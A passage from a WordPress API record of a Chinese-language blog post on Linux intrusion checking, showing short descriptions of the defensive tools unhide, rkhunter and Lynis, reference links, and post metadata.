has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u5176\u4ed6\u8f14\u52a9\u5de5\u5177\u6aa2\u67e5 <\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">unhide <\/h3>\n\n\n\n<p>\u4e00\u5957\u958b\u6e90\u5de5\u5177\u7684\u96c6\u5408\uff0c\u5c08\u9580\u7528\u65bc\u6aa2\u6e2c\u548c\u63ed\u793a\u96b1\u85cf\u7684\u9032\u7a0b\u3001\u6587\u4ef6\u3001\u7aef\u53e3\u548c\u7db2\u7d61\u9023\u63a5<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Rootkit Hunter <\/h3>\n\n\n\n<p>\u7c21\u7a31 rkhunter\uff0c\u662f\u4e00\u500b\u958b\u6e90\u7684 Unix-based \u5de5\u5177\uff0c\u5c08\u9580\u8a2d\u8a08\u7528\u65bc\u6383\u63cf\u7cfb\u7d71\u4ee5\u6aa2\u6e2c\u662f\u5426\u5b58\u5728 Rootkit\u3001\u5f8c\u9580 (backdoors) \u548c\u5176\u4ed6\u60e1\u610f\u8edf\u9ad4\u6216\u6f5b\u5728\u7684\u5b89\u5168\u6f0f\u6d1e<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Lynis <\/h3>\n\n\n\n<p>\u662f\u4e00\u500b\u975e\u5e38\u5168\u9762\u7684 Linux \u5b89\u5168\u5be9\u8a08\u5de5\u5177\u3002\u5b83\u57f7\u884c\u6578\u767e\u9805\u6e2c\u8a66\u4f86\u6aa2\u67e5\u7cfb\u7d71\u662f\u5426\u5b58\u5728\u914d\u7f6e\u932f\u8aa4\u3001\u904e\u6642\u7684\u8edf\u4ef6\u3001\u5b89\u5168\u6f0f\u6d1e\u3001\u4e0d\u5b89\u5168\u7684\u6b0a\u9650\u7b49\u7b49\u3002<\/p>\n\n\n\n<p>  <\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<p>\u53c3\u8003\u6587\u7ae0 <br><a href=\"https:\/\/www.freebuf.com\/vuls\/280991.html\" target=\"_blank\" rel=\"noopener\">https:\/\/www.freebuf.com\/vuls\/280991.html<\/a><br><a href=\"https:\/\/www.365seal.com\/y\/75pADNX4Vo.html\" target=\"_blank\" rel=\"noopener\">https:\/\/www.365seal.com\/y\/75pADNX4Vo.html<\/a>\u00a0 \u00a0 Linux\u5e94\u6025\u54cd\u5e94\u5165\u95e8\u2014\u2014\u5165\u4fb5\u6392\u67e5<br><a href=\"https:\/\/www.jianshu.com\/p\/afc845cf9cc9\" target=\"_blank\" rel=\"noopener\">https:\/\/www.jianshu.com\/p\/afc845cf9cc9<\/a>\u00a0\u00a0 Linux\u5e94\u6025\u54cd\u5e94\u5165\u95e8\u2014\u2014\u5165\u4fb5\u6392\u67e5<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u6982\u8ff0\u4e86\u6aa2\u67e5Linux\u7cfb\u7d71\u5b89\u5168\u7684\u591a\u500b\u65b9\u5411\uff0c\u5305\u62ec\u6aa2\u67e5\u547d\u4ee4\u6b77\u53f2\u3001\u8cec\u865f\u3001\u6392\u7a0b\u3001\u654f\u611f\u76ee\u9304\u3001\u767b\u5165\u8a18\u9304\u3001\u958b\u6a5f\u555f\u52d5\u6a94\u3001\u65e5\u5fd7\u8207\u884c\u7a0b\u7b49\uff0c\u4e26\u63d0\u4f9b\u4e86\u91dd\u5c0d\u7570\u5e38\u884c\u70ba\u7684\u5e38\u7528\u6aa2\u67e5\u6307\u4ee4\uff0c\u5177\u9ad4\u793a\u7bc4\u4e86\u60e1\u610f\u8173\u672c\u8207\u5f8c\u9580\u7684\u8b58\u5225\u65b9\u6cd5\u3002<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[10],"tags":[],"class_list":["post-1728","post","type-post","status-publish","format-standard","hentry","category-securitysloution"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1728","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1728"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1728\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1728"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1728"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1728"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}